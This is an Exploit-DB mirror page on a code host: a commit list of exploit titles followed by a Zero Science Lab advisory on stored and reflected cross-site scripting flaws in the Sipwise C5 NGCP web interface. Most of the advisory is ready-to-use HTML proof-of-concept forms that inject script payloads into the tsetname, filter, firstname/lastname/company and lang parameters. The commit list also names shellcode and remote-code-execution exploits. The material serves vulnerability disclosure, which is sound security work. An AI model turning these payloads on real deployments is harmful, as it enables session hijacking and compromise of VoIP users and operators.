bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/49800.html
Offensive Security f33a724e0b DB: 2021-10-29 
58 changes to exploits/shellcodes

Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
ProFTPD 1.3.7a - Remote Denial of Service
glFTPd 2.11a - Remote Denial of Service
Hasura GraphQL 1.3.3 - Denial of Service
Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
NBMonitor 1.6.8 - Denial of Service (PoC)
Nsauditor 3.2.3 - Denial of Service (PoC)
Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
Post-it 5.0.1 - Denial of Service (PoC)
Notex the best notes 6.4 - Denial of Service (PoC)
SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)
Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
Backup Key Recovery 2.2.7 - Denial of Service (PoC)
memono Notepad Version 4.2 - Denial of Service (PoC)

Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path

Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
vsftpd 3.0.3 - Remote Denial of Service

Dlink DSL2750U - 'Reboot' Command Injection

PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)

Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)

Arteco Web Client DVR/NVR - 'SessionId' Brute Force

Resumes Management and Job Application Website 1.0 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery
Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting

rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)

Mini Mouse 9.3.0 - Local File inclusion

rconfig 3.9.6 - Arbitrary File Upload

Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)

Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

OpenEMR 5.0.1.3 - Authentication Bypass
VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)

Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting

Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
Budget and Expense Tracker System 1.0 - Authenticated Bypass
Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)

WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)

Blood Bank System 1.0 - Authentication Bypass

Lodging Reservation Management System 1.0 - Authentication Bypass

Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read

Linux/x64 - /sbin/halt -p Shellcode (51 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)
Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)

Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
2021-10-29 05:02:12 +00:00

112 lines
No EOL
4 KiB
HTML
Raw Blame History

# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com
Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities
Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
cross-site scripting vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php
13.04.2021
--
Stored XSS (POST tsetname):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/callforward/time/set/save" method="POST">
<input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" />
<input type="hidden" name="subscriber&#95;id" value="401" />
<input type="hidden" name="x" value="90027" />
<input type="hidden" name="y" value="&#45;1" />
<input type="submit" value="Go for callforward" />
</form>
</body>
</html>
Reflected XSS (GET filter):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook" method="GET">
<input type="hidden" name="filter" value='"><script>confirm(251)</script>' />
<input type="hidden" name="x" value="0" />
<input type="hidden" name="y" value="0" />
<input type="submit" value="Go for addressbook" />
</form>
</body>
</html>
Stored XSS (POST firstname, lastname, company):
-----------------------------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook/save" method="POST">
<input type="hidden" name="firstname" value='"><script>alert(251)</script>' />
<input type="hidden" name="lastname" value='"><script>alert(251)</script>' />
<input type="hidden" name="company" value='"><script>alert(251)</script>' />
<input type="hidden" name="homephonenumber" value="1112223333" />
<input type="hidden" name="phonenumber" value="3332221111" />
<input type="hidden" name="mobilenumber" value="" />
<input type="hidden" name="faxnumber" value="" />
<input type="hidden" name="email" value="lab%40zeroscience.mk" />
<input type="hidden" name="homepage" value="" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="x" value="89957" />
<input type="hidden" name="y" value="21" />
<input type="submit" value="Go for addressbook 2" />
</form>
</body>
</html>
Reflected XSS (GET lang):
-------------------------
<html>
<body>
<form action="https://10.0.1.7/statistics/versions" method="GET">
<input type="hidden" name="lang" value="en'-alert(251)-'ZSL" />
<input type="submit" value="Go for statistics" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink